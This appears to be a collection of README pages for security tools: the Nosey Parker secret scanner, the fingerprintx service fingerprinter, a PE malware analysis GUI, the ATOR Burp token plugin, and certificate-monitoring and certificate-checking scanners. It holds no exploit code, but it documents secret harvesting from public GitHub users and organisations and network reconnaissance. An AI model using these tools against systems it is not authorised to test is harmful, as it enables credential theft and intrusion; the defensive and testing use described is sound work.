    Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data. It is useful both for offensive and defensive security testing.

    Key features:

    • It supports scanning files, directories, and the entire history of Git repositories
    • It uses regular expression matching with a set of 95 patterns chosen for high signal-to-noise based on experience and feedback from offensive security engagements
    • It groups matches together that share the same secret, further emphasizing signal over noise
    • It is fast: it can scan at hundreds of megabytes per second on a single core, and is able to scan 100GB of Linux kernel source history in less than 2 minutes on an older MacBook Pro

    This open-source version of Nosey Parker is a reimplementation of the internal version that is regularly used in offensive security engagements at Praetorian. The internal version has additional capabilities for false positive suppression and an alternative machine learning-based detection engine. Read more in blog posts here and here.


    Building from source

    1. (On x86_64) Install the Hyperscan library and headers for your system

    On macOS using Homebrew:

    brew install hyperscan pkg-config

    On Ubuntu 22.04:

    apt install libhyperscan-dev pkg-config

    1. (On non-x86_64) Build Vectorscan from source

    You will need several dependencies, including cmake, boost, ragel, and pkg-config.

    Download and extract the source for the 5.4.8 release of Vectorscan:

    wget https://github.com/VectorCamp/vectorscan/archive/refs/tags/vectorscan/5.4.8.tar.gz && tar xfz 5.4.8.tar.gz

    Build with cmake:

    cd vectorscan-vectorscan-5.4.8 && cmake -B build -DCMAKE_BUILD_TYPE=Release . && cmake --build build

    Set the HYPERSCAN_ROOT environment variable so that Nosey Parker builds against your from-source build of Vectorscan:

    export HYPERSCAN_ROOT="$PWD/build"

    Note: The Nosey Parker Dockerfile builds Vectorscan from source and links against that.

    2. Install the Rust toolchain

    Recommended approach: install from https://rustup.rs

    3. Build using Cargo

    cargo build --release

    This will produce a binary at target/release/noseyparker.

    Docker Usage

    A prebuilt Docker image is available for the latest release for x86_64:

    docker pull ghcr.io/praetorian-inc/noseyparker:latest

    A prebuilt Docker image is available for the most recent commit for x86_64:

    docker pull ghcr.io/praetorian-inc/noseyparker:edge

    For other architectures (e.g., ARM) you will need to build the Docker image yourself:

    docker build -t noseyparker .

    Run the Docker image with a mounted volume:

    docker run -v "$PWD":/opt/ noseyparker

    Note: The Docker image runs noticeably slower than a native binary, particularly on macOS.

    Usage quick start

    The datastore

    Most Nosey Parker commands use a datastore. This is a special directory that Nosey Parker uses to record its findings and maintain its internal state. A datastore will be implicitly created by the scan command if needed. You can also create a datastore explicitly using the datastore init -d PATH command.
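For example, to create a datastore up front (path is illustrative):

$ noseyparker datastore init -d np.example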

    Scanning filesystem content for secrets

    Nosey Parker has built-in support for scanning files, recursively scanning directories, and scanning the entire history of Git repositories.

For example, if you have a Git clone of CPython locally at cpython.git, you can scan its entire history with the scan command. Nosey Parker will create a new datastore at np.cpython and save its findings there.

    $ noseyparker scan --datastore np.cpython cpython.git
    Found 28.30 GiB from 18 plain files and 427,712 blobs from 1 Git repos [00:00:04]
Scanning content ████████████████████ 100% 28.30 GiB/28.30 GiB [00:00:53]
    Scanned 28.30 GiB from 427,730 blobs in 54 seconds (538.46 MiB/s); 4,904/4,904 new matches

    Rule Distinct Groups Total Matches
─────────────────────────────────────────────────────────
PEM-Encoded Private Key 1,076 1,192
    Generic Secret 331 478
    netrc Credentials 42 3,201
    Generic API Key 2 31
    md5crypt Hash 1 2

    Run the `report` command next to show finding details.

    Scanning Git repos by URL, GitHub username, or GitHub organization name

    Nosey Parker can also scan Git repos that have not already been cloned to the local filesystem. The --git-url URL, --github-user NAME, and --github-org NAME options to scan allow you to specify repositories of interest.

    For example, to scan the Nosey Parker repo itself:

    $ noseyparker scan --datastore np.noseyparker --git-url https://github.com/praetorian-inc/noseyparker

    For example, to scan accessible repositories belonging to octocat:

    $ noseyparker scan --datastore np.noseyparker --github-user octocat

    These input specifiers will use an optional GitHub token if available in the NP_GITHUB_TOKEN environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.

    See noseyparker help scan for more details.

    Summarizing findings

    Nosey Parker prints out a summary of its findings when it finishes scanning. You can also run this step separately:

    $ noseyparker summarize --datastore np.cpython

    Rule Distinct Groups Total Matches
─────────────────────────────────────────────────────────
    PEM-Encoded Private Key 1,076 1,192
    Generic Secret 331 478
    netrc Credentials 42 3,201
    Generic API Key 2 31
    md5crypt Hash 1 2

    Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

    Reporting detailed findings

    To see details of Nosey Parker's findings, use the report command. This prints out a text-based report designed for human consumption:

    (Note: the findings above are synthetic, invalid secrets.) Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

    Enumerating repositories from GitHub

    To list URLs for repositories belonging to GitHub users or organizations, use the github repos list command. This command uses the GitHub REST API to enumerate repositories belonging to one or more users or organizations. For example:

    $ noseyparker github repos list --user octocat
    https://github.com/octocat/Hello-World.git
    https://github.com/octocat/Spoon-Knife.git
    https://github.com/octocat/boysenberry-repo-1.git
    https://github.com/octocat/git-consortium.git
    https://github.com/octocat/hello-worId.git
    https://github.com/octocat/linguist.git
    https://github.com/octocat/octocat.github.io.git
    https://github.com/octocat/test-repo1.git

    An optional GitHub Personal Access Token can be provided via the NP_GITHUB_TOKEN environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.

    Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

    See noseyparker help github for more details.

    Getting help

    Running the noseyparker binary without arguments prints top-level help and exits. You can get abbreviated help for a particular command by running noseyparker COMMAND -h.

    Tip: More detailed help is available with the help command or long-form --help option.

    Contributing

    Contributions are welcome, particularly new regex rules. Developing new regex rules is detailed in a separate document.

    If you are considering making significant code changes, please open an issue first to start discussion.

    License

    Nosey Parker is licensed under the Apache License, Version 2.0.

    Any contribution intentionally submitted for inclusion in Nosey Parker by you, as defined in the Apache 2.0 license, shall be licensed as above, without any additional terms or conditions.



    Fingerprintx - Standalone Utility For Service Discovery On Open Ports!



fingerprintx is a utility similar to httpx that also supports fingerprinting services such as RDP, SSH, MySQL, PostgreSQL, Kafka, etc. fingerprintx can be used alongside port scanners like Naabu to fingerprint a set of ports identified during a port scan. For example, an engineer may wish to scan an IP range and then rapidly fingerprint the service running on all the discovered ports.


    Features

    • Fast fingerprinting of exposed services
    • Application layer service discovery
    • Plays nicely with other command line tools
    • Automatic metadata collection from identified services

    Supported Protocols:

    SERVICE TRANSPORT SERVICE TRANSPORT
    HTTP TCP REDIS TCP
    SSH TCP MQTT3 TCP
    MODBUS TCP VNC TCP
    TELNET TCP MQTT5 TCP
    FTP TCP RSYNC TCP
    SMB TCP RPC TCP
    DNS TCP OracleDB TCP
    SMTP TCP RTSP TCP
    PostgreSQL TCP MQTT5 TCP (TLS)
    RDP TCP HTTPS TCP (TLS)
    POP3 TCP SMTPS TCP (TLS)
    KAFKA TCP MQTT3 TCP (TLS)
    MySQL TCP RDP TCP (TLS)
    MSSQL TCP POP3S TCP (TLS)
    LDAP TCP LDAPS TCP (TLS)
    IMAP TCP IMAPS TCP (TLS)
    SNMP UDP Kafka TCP (TLS)
    OPENVPN UDP NETBIOS-NS UDP
    IPSEC UDP DHCP UDP
    STUN UDP NTP UDP
    DNS UDP

    Installation

    From Github

    go install github.com/praetorian-inc/fingerprintx/cmd/fingerprintx@latest

    From source (go version > 1.18)

    $ git clone git@github.com:praetorian-inc/fingerprintx.git
    $ cd fingerprintx

    # with go version > 1.18
    $ go build ./cmd/fingerprintx
    $ ./fingerprintx -h

    Docker

    $ git clone git@github.com:praetorian-inc/fingerprintx.git
    $ cd fingerprintx

    # build
    docker build -t fingerprintx .

    # and run it
    docker run --rm fingerprintx -h
    docker run --rm fingerprintx -t praetorian.com:80 --json

    Usage

    fingerprintx -h

    The -h option will display all of the supported flags for fingerprintx.

    Usage:
    fingerprintx [flags]
    TARGET SPECIFICATION:
    Requires a host and port number or ip and port number. The port is assumed to be open.
    HOST:PORT or IP:PORT
    EXAMPLES:
    fingerprintx -t praetorian.com:80
    fingerprintx -l input-file.txt
    fingerprintx --json -t praetorian.com:80,127.0.0.1:8000

    Flags:
    --csv output format in csv
    -f, --fast fast mode
    -h, --help help for fingerprintx
    --json output format in json
    -l, --list string input file containing targets
    -o, --output string output file
    -t, --targets strings target or comma separated target list
    -w, --timeout int timeout (milliseconds) (default 500)
    -U, --udp run UDP plugins
    -v, --verbose verbose mode

    The fast mode will only attempt to fingerprint the default service associated with that port for each target. For example, if praetorian.com:8443 is the input, only the https plugin would be run. If https is not running on praetorian.com:8443, there will be NO output. Why do this? It's a quick way to fingerprint most of the services in a large list of hosts (think the 80/20 rule).
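A sketch of fast mode over a target list (file name is illustrative):

# Only try the default service plugin for each port, e.g. https for 8443
$ fingerprintx -f -l input-file.txt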

    Running Fingerprintx

    With one target:

    $ fingerprintx -t 127.0.0.1:8000
    http://127.0.0.1:8000

    By default, the output is in the form: SERVICE://HOST:PORT. To get more detailed service output specify JSON with the --json flag:

    $ fingerprintx -t 127.0.0.1:8000 --json
    {"ip":"127.0.0.1","port":8000,"service":"http","transport":"tcp","metadata":{"responseHeaders":{"Content-Length":["1154"],"Content-Type":["text/html; charset=utf-8"],"Date":["Mon, 19 Sep 2022 18:23:18 GMT"],"Server":["SimpleHTTP/0.6 Python/3.10.6"]},"status":"200 OK","statusCode":200,"version":"SimpleHTTP/0.6 Python/3.10.6"}}

    Pipe in output from another program (like naabu):

    $ naabu 127.0.0.1 -silent 2>/dev/null | fingerprintx
    http://127.0.0.1:8000
    ftp://127.0.0.1:21

    Run with an input file:

    $ cat input.txt | fingerprintx
    http://praetorian.com:80
    telnet://telehack.com:23

    # or if you prefer
    $ fingerprintx -l input.txt
    http://praetorian.com:80
    telnet://telehack.com:23

    With more metadata output:

    Why Not Nmap?

Nmap is the standard for network scanning. Why use fingerprintx instead of nmap? The two main reasons are:

    • fingerprintx works smarter, not harder: the first plugin run against a server with port 8080 open is the http plugin. The default service approach cuts down scanning time in the best case. Most of the time the services running on port 80, 443, 22 are http, https, and ssh -- so that's what fingerprintx checks first.
    • fingerprintx supports json output with the --json flag. Nmap supports numerous output options (normal, xml, grep), but they are often hard to parse and script appropriately. fingerprintx supports json output which eases integration with other tools in processing pipelines.

    Notes

    • Why do you have a third_party folder that imports the Go cryptography libraries?
      • Good question! The ssh fingerprinting module identifies the various cryptographic options supported by the server when collecting metadata during the handshake process. This makes use of a few unexported functions, which is why the Go cryptography libraries are included here with an export.go file.
    • Fingerprintx is not designed to identify open ports on the target systems and assumes that every target:port input is open. If none of the ports are open there will be no output as there are no services running on the targets.
    • How does this compare to zgrab2?
      • The zgrab2 command line usage (and use case) is slightly different than fingerprintx. For zgrab2, the protocol must be specified ahead of time: echo praetorian.com | zgrab2 http -p 8000, which assumes you already know what is running there. For fingerprintx, that is not the case: echo praetorian.com:8000 | fingerprintx. The "application layer" protocol scanning approach is very similar.

    Acknowledgements

    fingerprintx is the work of a lot of people, including our great intern class of 2022. Here is a list of contributors so far:



    PortexAnalyzerGUI - Graphical Interface For PortEx, A Portable Executable And Malware Analysis Library



    Graphical interface for PortEx, a Portable Executable and Malware Analysis Library

    Download

    Releases page

    Features

    • Header information from: MSDOS Header, Rich Header, COFF File Header, Optional Header, Section Table
    • PE Structures: Import Section, Resource Section, Export Section, Debug Section
    • Scanning for file format anomalies
    • Visualize file structure, local entropies and byteplot, and save it as PNG
    • Calculate Shannon Entropy, Imphash, MD5, SHA256, Rich and RichPV hash
    • Overlay and overlay signature scanning
    • Version information and manifest
    • Icon extraction and saving as PNG
    • Customized signature scanning via Yara. Internal signature scans using PEiD signatures and an internal filetype scanner.

    Supported OS and JRE

    I test this program on Linux and Windows. But it should work on any OS with JRE version 9 or higher.

    Future

    I will keep adding more of the features that PortEx already provides.

    These features include among others:

    • customized visualization
    • extraction and conversion of icons to .ICO files
    • dumping of sections, overlay, resources
    • export reports to txt, json, csv

    Some of these features are already provided by the PortexAnalyzer CLI version, which you can find here: PortexAnalyzer CLI

    Donations

    I develop PortEx and PortexAnalyzer as a hobby in my free time. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

    Author

    Karsten Hahn

    Twitter: @Struppigel

    Mastodon: struppigel@infosec.exchange

    Youtube: MalwareAnalysisForHedgehogs

    License

    See the License file in the repository.



    Ator - Authentication Token Obtain and Replace Extender


    The plugin was created to help automate scanning with Burp in the following scenarios:

    1. Access/refresh token handling
    2. Token replacement in XML or JSON bodies
    3. Token replacement in cookies

    The above can be achieved with complex macros, session rules, or a custom extender in some scenarios, but the rules become tricky and do not work when the replacement text is JSON or XML.

    Key advantages:

    1. In-memory token replacement avoids the duplicate login requests incurred by both custom extenders and macros/session rules.
    2. Easy UX for obtaining data (from responses) and replacing data (in requests) using regex. This helps with complex scenarios where the response body is JSON or XML and the request text is JSON, XML, form data, etc.
    3. Scan speed: scans run considerably faster because there are no extra login requests. Login requests are only triggered by the "Trigger Request", i.e. the error condition (which also supports regex); the error condition can be, for example, response code = 401 and body contains "Unauthorized request".

    The inspiration for the plugin comes from the ExtendedMacro plugin: https://github.com/FrUh/ExtendedMacro

    Blogs

    1. Authentication Token Obtain and Replace (ATOR) Burp Plugin - Part 1 - Single-step login sequence and single token extraction
    2. Authentication Token Obtain and Replace (ATOR) Burp Plugin - Part 2 - Multi-step login sequence and multiple extractions

    Getting Started

    1. Install Java and Maven
    2. Clone the repository
    3. Run the "mvn clean install" command in cloned repo of where pom.xml is present
    4. Take the generated jar with dependencies from the target folder
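    A condensed sketch of the build steps (the jar name assumes Maven's usual jar-with-dependencies suffix):

    $ mvn clean install
    $ ls target/*-jar-with-dependencies.jar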

    Prerequisites

    1. Make sure a Java environment is set up on your machine.
    2. Configure Burp Suite to listen to the proxy traffic.
    3. Configure the Java environment from the Extender tab of Burp.

    For usage with a test application, install the Tiredful application from https://github.com/payatu/Tiredful-API.

    Steps

    1. Identify the request which provides the error
    2. Identify the Error Pattern (details in section below)
    3. Obtain the data from the response using regex (see sample regex values)
    4. Replace this data on the request (use same regex as step 3 along with the variable name)

    Error Pattern:

    There are 4 different ways to specify the error condition.

    1. Status Code: 401, 400
    2. Error in Body: give any text from the body content (Example: Access token expired)
    3. Error in Header: give any text from the header (Example: Unauthorized)
    4. Free Form: use this to combine multiple conditions (st=400 && bd=Access token expired || hd=Unauthorized)

    Regex with samples

    1. Use Authorization: Bearer \w* to match Authorization: Bearer AXXFFPPNSUSSUSSNSUSN
    2. Use Authorization: Bearer ([\w+.-]*) to match Authorization: Bearer AXX-F+FPPNS.USSUSSNSUSN (the - is placed last in the character class so it is not read as a range)
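    These patterns can be sanity-checked from a shell before wiring them into ATOR. A sketch using GNU grep and sed (token values are illustrative):

    $ echo 'Authorization: Bearer AXX-F+FPPNS.USSUSSNSUSN' | grep -oP 'Authorization: Bearer [\w+.-]*'
    Authorization: Bearer AXX-F+FPPNS.USSUSSNSUSN
    $ echo 'Authorization: Bearer OLDTOKEN' | sed -E 's/Authorization: Bearer \w*/Authorization: Bearer NEWTOKEN/'
    Authorization: Bearer NEWTOKEN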

    Break down into end-to-end tests

    1. Finding the invalid request:
      • http://HOST:PORT/api/v1/exams/MQ==/ with an invalid Bearer token.
    2. Identifying the error pattern:
      • The above request will return a 401, so the error condition here is Status Code = 401.
    3. Matching the regex against the request data:
      • Authorization: Bearer \w* - this regex will match the access token that is passed.
    4. Replacement - how to replace:
      • Replace the matched text (step 3 regex) with the extracted value (the extraction configuration is discussed below; say the variable name is "token").
      • Authorization: Bearer token - the extracted token will be substituted here.

    Usage with test application

    Idea: record the Tiredful application requests in Burp, configure the ATOR extender, and check whether the token is replaced by ATOR.

    1. Open the testing application in the browser you configured with Burp:
      • Generate a token from http://HOST:PORT/handle-user-token/
      • Send the request http://HOST:PORT/api/v1/exams/MQ==/, passing the Authorization Bearer token (from the step above)
    2. Add the ATOR jar file as an extender in Burp.
    3. Right-click the request (/handle-user-token) in Proxy history and send it to the Authentication Token Obtain and Replace extender.
    4. Add a new entry in the extraction configuration by selecting the "access_token" value and giving it a name such as "token" (any name works). Note: for this application, one request is enough to generate a token; a token can also be generated after multiple requests.
    5. TRIGGER CONDITION:
      • Macro steps are executed when the condition matches.
      • After the steps execute, the incoming request is rewritten using the values from "Pattern" and "Replacement Area", if specified.
      • For our testing:
        • The error condition is 401 (Status Code)
        • The pattern is "Authorization: Bearer \w*" (the regex pattern specifying what to replace with the extracted values)
        • The replacement area is "Authorization: Bearer <NAME which you gave in STEP 4>"
      • Click the "Add" button.
    6. For this example, one replacement is enough to make the incoming request valid, but you can add multiple replacements for a single condition.
    7. Send the invalid request from Repeater and check the req/res flow in either Flow or Logger++:
      • The invalid Bearer token (http://HOST:PORT/api/v1/exams/MQ==/) from Repeater results in a 401 response.
      • The extender matches this condition, runs the recorded steps, and extracts the "access_token".
      • It replaces the access token (from the step above) in the actual request (from Repeater), making the invalid request valid.
      • In the Repeater console, you see a 200 OK response.
    8. Repeat step 7 and check the flow:
      • This time the extender does not invoke the steps, because the existing token is still valid, so it is reused.

    Built With

    • Swing - used to build the UI panels

    Contributing

    Please read CONTRIBUTING.md for details on our code of conduct, and the process for submitting pull requests to us.

    Versioning

    v1.0

    Authors

    Authors from Synopsys - Ashwath Reddy (@ka3hk) and Manikandan Rajappan (@rmanikdn)

    License

    This software is released by Synopsys under the MIT license.

    Acknowledgments

    • https://github.com/FrUh/ExtendedMacro - ExtendedMacro was a great starting point; we modified the UI to handle more complex scenarios, fixed bugs, and improved speed by replacing tokens in memory.

    Demo Video

    ATOR v2.0.0:

    The UI panel was split into 4 configuration sections. Check out the code from v2 or use the executable from v2/bin.

    1. Error Condition - find the error-condition req/res and add the trigger condition (it can be a status code, text in the body content, or text in a header). Multiple conditions can also be added.
    2. Obtain Token - find all the req/res needed to get the token. It can be a single request or multiple requests (do the replacement accordingly).
    3. Error Condition Replacement - mark the trigger condition and mark the place in the request where the replacement needs to be made (map the extraction).
    4. Preview - dry-run the setup before configuring it for a scan.


    CertWatcher - A Tool For Capturing And Tracking Certificate Transparency Logs, Using A YAML Template-Based DSL


    CertWatcher is a tool for capturing and tracking certificate transparency logs using YAML templates. It helps detect and analyze phishing websites via regular-expression patterns, and is designed to be easy to use for security professionals and researchers.



    Certwatcher continuously monitors the certificate data stream and checks for suspicious patterns or malicious activity. Certwatcher can also be customized to detect specific phishing patterns and combat the spread of malicious websites.

    Get Started

    Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.

    Contribution

    If you want to contribute to this project, follow the steps below:

    • Fork this repository.
    • Create a new branch with your feature: git checkout -b my-new-feature
    • Make changes and commit the changes: git commit -m 'Adding a new feature'
    • Push the branch: git push origin my-new-feature
    • Open a pull request.


    CertVerify - A Scanner That Detects Files Signed With Compromised Or Untrusted Code Signing Certificates


    CertVerify is a tool designed to detect executable files (exe, dll, sys) that have been signed with untrusted or leaked code signing certificates. Its purpose is to identify potentially malicious files signed using certificates that have been compromised, stolen, or are not from a trusted source.

    Why is this tool needed?

    Executable files signed with compromised or untrusted code signing certificates can be used to distribute malware and other malicious software. Attackers can use these files to bypass security controls and to make their malware appear legitimate to victims. This tool helps to identify these files so that they can be removed or investigated further.

    I created this tool as a continuation of my previous malware scanner project. This kind of tool is also essential during security incident response.

    Scope of use and limitations

    1. CertVerify cannot guarantee that all files identified as suspicious are actually malicious. Files may be falsely flagged as suspicious, and malicious files may go undetected by the scanner.

    2. The scanner only targets code signing certificates that have been identified as malicious by the public community, including certificates extracted by malware analysis tools and services and other public sources. There are many unverified malware-signing certificates, and it is not possible to obtain all of them, so the tool can only detect some. For additional detection, you have to extract the certificate's serial number and fingerprint yourself and add them to the signatures (see the sketch after this list).

    3. The scope of this tool does not include extracting code signing information from special rootkits that have already taken hold beneath the OS, such as fileless bootkits, or from files hidden with advanced techniques. In other words, this tool runs at the user level. Similar functionality at the kernel level is handled more accurately by an anti-rootkit or EDR. Please keep this in mind and focus on the ideas and principles; to implement the principle appropriate for that purpose, you would need to develop a driver (sys) and run it in the kernel with NT\SYSTEM privileges.

    4. Nevertheless, if you want to run this tool during a Windows intrusion incident and your targets are sys files, boot into safe mode or another boot option that loads only the default system drivers (not the extra driver/sys files) before running the tool. I think this can be a little more helpful.

    5. Alternatively, mount the Windows system disk on a Linux machine and run the tool in the Linux environment. I think this could yield better results.
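    A rough sketch of one way to extract those values on Linux (assuming osslsigncode and openssl are installed; the file name is illustrative):

    # pull the Authenticode signature out of the PE file
    $ osslsigncode extract-signature -in sample.exe -out sig.der
    # print the signer certificate's serial number and SHA-256 fingerprint
    $ openssl pkcs7 -inform DER -in sig.der -print_certs | openssl x509 -noout -serial -fingerprint -sha256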

    Features

    • File inspection based on leaked or untrusted certificate lists.
    • Scanning includes subdirectories.
    • Ability to define directories to exclude from scanning.
    • Supports multiprocessing for faster job execution.
    • Whitelisting based on certificate subject (e.g., Microsoft subject certificates are exempt from detection).
    • Option to skip inspection of unsigned files for faster scans.
    • Easy integration with SIEM systems such as Splunk by attaching scan_logs.
    • Easy-to-handle and customizable code and function structure.

    And...

    • Please let me know if any changes are required or if additional features are needed.
    • If you find this helpful, please consider giving it a "star" to support further improvements.

    v1.0.0

    Scan result_log

    datetime="2023-03-06 20:17:57",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\chrome.exe",signature_hash="sha256",serial_number="0e4418e2dede36dd2974c3443afb5ce5",thumbprint="7d3d117664f121e592ef897973ef9c159150e3d736326e9cd2755f71e0febc0c",subject_name="Google LLC",issu   er_name="DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",file_created_at="2023-03-03 23:20:41",file_modified_at="2022-04-14 06:17:04"
    datetime="2023-03-06 20:17:58",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineLauncher.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-03-10 18:00:10"
    datetime="2023-03-06 20:17:58",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineUpdater.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumb print="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-06 10:06:28"
    datetime="2023-03-06 20:17:59",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\TWOD_Launcher.exe",signature_hash="sha256",serial_number="073637b724547cd847acfd28662a5e5b",thumbprint="281734d4592d1291d27190709cb510b07e22c405d5e0d6119b70e73589f98acf",subject_name="DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA",issuer_name="DigiCert Trusted Root G4",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-07 09:14:08"
    datetime="2023-03-06 20:18:00",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject \certverify\test\VBoxSup.sys",signature_hash="sha256",serial_number="2f451139512f34c8c528b90bca471f767b83c836",thumbprint="3aa166713331d894f240f0931955f123873659053c172c4b22facd5335a81346",subject_name="VirtualBox for Legacy Windows Only Timestamp Kludge 2014",issuer_name="VirtualBox for Legacy Windows Only Timestamp CA",file_created_at="2023-03-03 23:20:43",file_modified_at="2022-10-11 08:11:56"
    datetime="2023-03-06 20:31:59",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\chrome.exe",signature_hash="sha256",serial_number="0e4418e2dede36dd2974c3443afb5ce5",thumbprint="7d3d117664f121e592ef897973ef9c159150e3d736326e9cd2755f71e0febc0c",subject_name="Google LLC",issuer_name="DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",file_created_at="2023-03-03 23:20:41",file_modified_at="2022-04-14 06:17:04"
    datetime="2023-03-06 20:32:00",scan_id="f71277c 5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineLauncher.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-03-10 18:00:10"
    datetime="2023-03-06 20:32:00",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineUpdater.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-06 10:06:28"
    datetime="2023-03-06 20:32:01",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\TWOD_Launcher.exe",signature_hash="sha256",serial_number="073637b724547cd847acfd28662a5e5b",thumbprint="281734d4592d1291d27190709cb510b07e22c405d5e0d6119b70e73589f98acf",subject_name="DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA",issuer_name="DigiCert Trusted Root G4",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-07 09:14:08"
    datetime="2023-03-06 20:32:02",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\VBoxSup.sys",signature_hash="sha256",serial_number="2f451139512f34c8c528b90bca471f767b83c836",thumbprint="3aa166713331d894f240f0931955f123873659053c172c4b22facd5335a81346",subjec t_name="VirtualBox for Legacy Windows Only Timestamp Kludge 2014",issuer_name="VirtualBox for Legacy Windows Only Timestamp CA",file_created_at="2023-03-03 23:20:43",file_modified_at="2022-10-11 08:11:56"
    datetime="2023-03-06 20:33:45",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\chrome.exe",signature_hash="sha256",serial_number="0e4418e2dede36dd2974c3443afb5ce5",thumbprint="7d3d117664f121e592ef897973ef9c159150e3d736326e9cd2755f71e0febc0c",subject_name="Google LLC",issuer_name="DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",file_created_at="2023-03-03 23:20:41",file_modified_at="2022-04-14 06:17:04"
    datetime="2023-03-06 20:33:45",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineLauncher.exe",signature_hash="sha 256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-03-10 18:00:10"
    datetime="2023-03-06 20:33:45",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineUpdater.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-06 10:06:28"
    datetime="2023-03-06 20:33:46",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192. 168.0.23",infected_file="F:\code\pythonProject\certverify\test\TWOD_Launcher.exe",signature_hash="sha256",serial_number="073637b724547cd847acfd28662a5e5b",thumbprint="281734d4592d1291d27190709cb510b07e22c405d5e0d6119b70e73589f98acf",subject_name="DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA",issuer_name="DigiCert Trusted Root G4",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-07 09:14:08"
